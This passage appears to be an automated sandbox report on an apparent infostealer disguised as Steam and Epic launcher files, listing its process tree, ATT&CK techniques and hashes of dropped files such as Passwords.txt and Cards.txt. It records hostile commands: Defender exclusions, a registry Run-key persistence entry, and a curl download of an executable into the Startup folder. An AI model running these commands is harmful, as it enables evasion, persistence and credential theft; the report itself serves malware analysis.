C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:4328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:1596

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:1072

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:4640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:3128

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:2480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:1200

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:1208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:4344

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:4884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:3828

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:1564

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:1336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:4436

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:3284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:3904

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:3936

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:2392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:1016

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:2556

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:4540

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:4700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
PID:1464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:1072

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:2668

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:3872

C:\Windows\system32\cscript.EXE
C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs
1⤵
- Modifies data under HKEY_USERS
PID:2684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
2⤵
PID:3184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1112

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe" /f
3⤵
- Modifies registry key
PID:2480

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
3⤵
- Modifies registry key
PID:3672

C:\Windows\system32\curl.exe
curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
3⤵
PID:3144

C:\Windows\system32\cscript.EXE
C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs
1⤵
PID:3064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
2⤵
PID:2640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2236

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe" /f
3⤵
- Modifies registry key
PID:4776

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
3⤵
- Modifies registry key
PID:2088

C:\Windows\system32\curl.exe
curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
3⤵
PID:2340

C:\Windows\system32\cscript.EXE
C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs
1⤵
- Modifies data under HKEY_USERS
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
2⤵
PID:1432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2160

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe" /f
3⤵
- Modifies registry key
PID:4984

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
3⤵
- Modifies registry key
PID:696

C:\Windows\system32\curl.exe
curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
3⤵
PID:3684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-SNF~1\debug.log

Filesize
1KB

MD5
0d1879076dacdf05da6fe52858c10de8

SHA1
354fc35c9fa0b291b29f547a5ca2f26cb1a40642

SHA256
e205d2893fe727a7a47f631001957a84421a8a4c708e53172cd65cf6c7520a57

SHA512
82bb1e0da63b30ae700f5eb9b5790603182b2c5f8c1ef6c1b3ec5c34bfd260dcb38529800630215af3c36668af4b9d190733a62c94170b58d2893956102177f1

Download Submit
C:\ProgramData\Steam\Launcher\EN-Snfvgqlu.zip

Filesize
2KB

MD5
8adde5351bfd9d26dc1fa3a0e14eb1fa

SHA1
81029bb62fd789604c9a2155a1d3d9e6ec5ac5a6

SHA256
1364b850e4e4dedacd6936cecf095a59833aee99d43c3a92643873729f68ccff

SHA512
ac2e2518f29e4c1e23e3d3c1af4842de863cd78449f8a86c303268ffbb8e672ac53e16320c95872b9e52736219575029ddc4e4ddc3e802803645d05c0ca18a8e

Download Submit
C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Autofills\Autofills.txt

Filesize
94B

MD5
2f308e49fe62fbc51aa7a9b987a630fe

SHA1
1b9277da78babd9c5e248b66ba6ab16c77b97d0b

SHA256
d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

SHA512
c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

Download Submit
C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Cards\Cards.txt

Filesize
70B

MD5
8a0ed121ee275936bf62b33f840db290

SHA1
898770c85b05670ab1450a96ea6fbd46e6310ef6

SHA256
983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

SHA512
7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

Download Submit
C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Passwords\Passwords.txt

Filesize
78B

MD5
c5e74f3120dbbd446a527e785dfe6d66

SHA1
11997c2a53d19fd20916e49411c7a61bfb590e9c

SHA256
e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05

SHA512
a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Screenshots\Screenshot.png

Filesize
429KB

MD5
5bc83cfddc5688f28c917d845f686180

SHA1
755c1061d6f889852e92b6186b14e89307ddc3ef

SHA256
92ac9e1aa18a215db21e206b820409537ba688ba1329e9276837a430515d4a17

SHA512
0d78709f5de2382111090138c7c75c9a22a1839d82dff82f44b7c8a0fecaa49b90df84a7aabd844eaf1ee8ca680357f820a8ecdfb620c2f59819bc8bbded1d8b

Download Submit
C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Serial-Check.txt

Filesize
506B

MD5
58b44957ab8b22e56645f5862605d272

SHA1
0e7506e3ee9445fe17384f891fa416cf3c7b1fa2

SHA256
92bdafde3e7cc69e6ae450c6d0ad76ddb64c82b4f145bf3df4c714b161f3b3d4

SHA512
2dd56cf32c78574c970bde945948a887a1db62df4a23112cca40f0f94ab4e395c9d9fc19f64845820278c573baba0cb1436e6ce950e60c4da772bb1f3f105905

Download Submit
C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\debug.log

Filesize
1KB

MD5
e032358854887da614a582f5c03b63df

SHA1
5b158b7928b7fd8795d3d07ad6d4c98330c56841

SHA256
3af09fd7278ec472e367b68b307514fb59b2043e1f0a9f7054d792121b56cbd6

SHA512
678b01314c3f6fbfd25c0753d9cd065d85987766d841d2968b9d33f98d28acb4232085075c3be018be7b17a4f79df2f4a3ba1d58c7efd85998a8e808d2893045

Download Submit
C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
745cd559fffd2d5f70b73648edf9b3f6

SHA1
5e947c85945a3c4d530896d478abc066c04a2ac0

SHA256
40f1cb4b2a31741d50f3ddd3023096f94f18b5457a45d96e79cb0f4f786c96bd

SHA512
eb0c6ce871348073278e30c35b58e58020dc1ae27aa2ac27d74304f6914605ad08b7fec80f4e1996a5d073570f79b030ddbfad6568918e85717bb11065e31834

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
46d6c89b6a449ce91c1a3691c516e10e

SHA1
dedf2c05d83a8fc311e39fa86af575866f9f7ece

SHA256
f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f

SHA512
bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5fcfa95543a7088c79ff4dd7ce6cd352

SHA1
5fc2045faf1c35ebf32907a4b8cf76874fd31f43

SHA256
e11655e31ad254ca1490f992e8044548acd1c0c19003bebfc8e41320e03aad8e

SHA512
b99a12c3c46a3b4e5cd5ba65c933fbbff35d567ea182c0b3902479605898e21f3c245f7f50736f1d16f8449d251b1bdaefe5b3cc060902095a22b27334e4b385

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0717ac3697a50ac592dd481dd99f72cf

SHA1
094ebd8d56d099a50eed70b9797f271940784fdb

SHA256
be01fb5b572fc90c752b35f000963c7411f63d3895821f02bbba1b2867015972

SHA512
a81a6ae983dc2d0363734764bd2d70547db05f4e9c5ede8e45c61d1b8470846e471495f590d9ee9a028b4a67058a7b39a1201a6bd874c879cbc76955cbb881a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d65ebc84c6b0b52901fb46f5e2b83ab5

SHA1
d036a0c3eb9e1616d0f7f5ca41171060c13a3095

SHA256
d45581b0807a0d04a70ec75e3e4575e73f148e5b4e0d3d325dfbd6400a4bfbd1

SHA512
88ac232e7702ebd53788cf8429d266ae367111bfccf4bc9d40ead25b552347521458ca60d320e2775b5d2edcaf8501251cb2db68b38dc000ac50463fb80865be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
dcfe1f94aa15e3ca618b4c5002c9c055

SHA1
b8abdaf68684bc49756086840035b93f79329892

SHA256
cf11bfe8cd92fd4293ae0bd884f2c3d397e68d54ea03352027ed6b6c93e8630d

SHA512
bce3736f22af50ef73c7ca17942eebddc00ea5b216fa9ad8c704fb6b5c0cc8d0b8aa992fc47270148c23d8257ba2ab9cae079ca239abebef7a92182941f8a73c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ca24df1817fa1aa670674846e5d41614

SHA1
dac66ea013bcc46d24f1ece855568187c6080eaf

SHA256
3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db

SHA512
fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
db7bf9eecdd39389a66535a8ac628e24

SHA1
d8c0f5e02def7a5634b5acaa3a4f8df17ade140a

SHA256
8ad88571b5fa5db3ef1c85d1ebf9da4cbd80b3de832006818032be3445f1b049

SHA512
a4224714354384ad3d93949450758fd6fc4245ac4f7ae8ad5b1cdda344d07351e84d5f0b484af87f6f8efcb43f21495c86e7f38df609892125ae3d32da9de0fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES47D6.tmp

Filesize
1KB

MD5
f2f6c42140cb9c2f128042b6f90c9d72

SHA1
b9cdf359ed0f86351ffdb38797e0c4fa4d8e9fa7

SHA256
a3f8a19553ab36269e055bdfe896b823abe5c331bb151613191053538bc59a6c

SHA512
bedaab18c744249b70187248a42837ad79d5ca0be48e6c663f1b52915730729ab4d838b1e12bb1fb27e84f03ccbc5405eb8826c86f9b9fb49cee259f6cc085be

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5033.tmp

Filesize
1KB

MD5
9d53f0ddf801db13f663a18c39ef00b5

SHA1
29cfbaeb397ffe65e1746bb2f7f0833a31a48264

SHA256
8c026fe18f554f84856eb41396607732bd318f9ca40980804aa3a2da8db2edc5

SHA512
fd328c3e425b9c0f9f695ba8c15bfc3cbe79f12dda97d1fdfa9b3f7abdd2e3d45799cdd867a0da5a1b64b509536e69923cc7c0f00983cc86b69b3ae7e4672973

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_inpwboh5.0lx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dhjd5vjv\dhjd5vjv.dll

Filesize
3KB

MD5
dedcdc3a70854892c50f08c704af1da6

SHA1
a72b6bf8be6b8182e1ceca24c92ad6767b467a6e

SHA256
a31540310bdaf5b1106c336d57d9331451b9d7c4c449e21ee65e9b9900500edd

SHA512
33595c2f94389bbcabd1e3be20a6cc0bf4729a24c2bcc0a98fbec0838e64254c03757668b8de31c1077813c6ade20cb5551707245326a9c2a03c6f350d96239c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\zkdvhlze\zkdvhlze.dll

Filesize
3KB

MD5
a5163f92e10f086a10771571dd6850f2

SHA1
ca5571b74d853cd9e56e3db77bbd2fb60cbb78d7

SHA256
f07c291ac7df1b4a0e61f8348459a44f8eb3212cc2dbd7d9dc8a08acd4a2ce8a

SHA512
a20574523e3379fd385c9e6abd2469908941ffb1d0f9a0b6a805d4e663ae6d466befe6c2fda03c3083c9dd43ad9ad0a0f2ef20389a9933c2eb6195a95fb7deb8

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
222e96e3f1e9be032bb397ab2ece584b

SHA1
47fce4a53be64b48981af5bc9175833ff0272dbe

SHA256
21711df817320b8a78a0bd1bb997795eb44a7ab4e831491ac169f9f9a04d005c

SHA512
e2a8f1483a7a5445613e495a0891cb999489397a1cd35bfdc810a928ec782987ed71e1ac13b9f74efce9af7ee26ee85ec6332f31b35c2bd606a7a46612f9b768

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
82f3a69ec4e0089147bcdfdbb517da54

SHA1
d26c5d8a26d968c7f72bf0602d7e1413a0e1b5c3

SHA256
90f02fcf153684c02af1d99760cd6ebf0c7e0975962d00fe2b5d016440a14d97

SHA512
9f77a46f4228c1c7ef3c4e9717804d5c84b4e57d5ff2b61dfa32a515dd510648c2d87f12315ccc21770e872a659e05c884e22f3bfa36afdc2884b847a8d9c55f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
42a8a08e00f0ecce2e9bfe914e5aae78

SHA1
bd833e16dd78a502c8cf4047750ee13a45763cf4

SHA256
a3a12e8a72545e549819cb0231a0c903a2be15b23758729fb89f6ed173af1ae6

SHA512
bf3c139512140a7c4c70a53ba0d1eba4ebfe04795f4f7c83efac82f9c3f2b270feb4a668cab2a06556493d3c4f718f8f6777883e86fb28a87be6baa7401e6767

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2b85b3fc0c70dfbc10f7497e827d87d2

SHA1
f8e8a7bc5be3b40881206061294f3e8e320c3b82

SHA256
5fedc94f5f23296f879f21c3e9a80c872e72730e3f28821669dcfc0b03f7283a

SHA512
0d008866b6c3c9f8f7c68bb2d60b3f49b72066365470f757a54c268968902a3e37c979b3ec3875a600b7f805eaff9b0e30861bb6b5b9d1624fc267057a86a5b6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dhjd5vjv\CSC94A25C3DBBC24965A2ECB09070605D9C.TMP

Filesize
652B

MD5
b79eba992d1f53833beeb450da93d824

SHA1
6665afe4a7782d806655a2d7adad619becb1be77

SHA256
ca0f54b66879cd2750f28a3524c0a073f74187dd4a957968b1914c693b3e02f9

SHA512
ec184d63886c36f726f0c3cb737b72bb22e46e8297729a814dedb57d77eb5fd3ac5625ebf41f78a8a7009939895461c78e975de6b7b4e025b52b3146da43793d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dhjd5vjv\dhjd5vjv.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
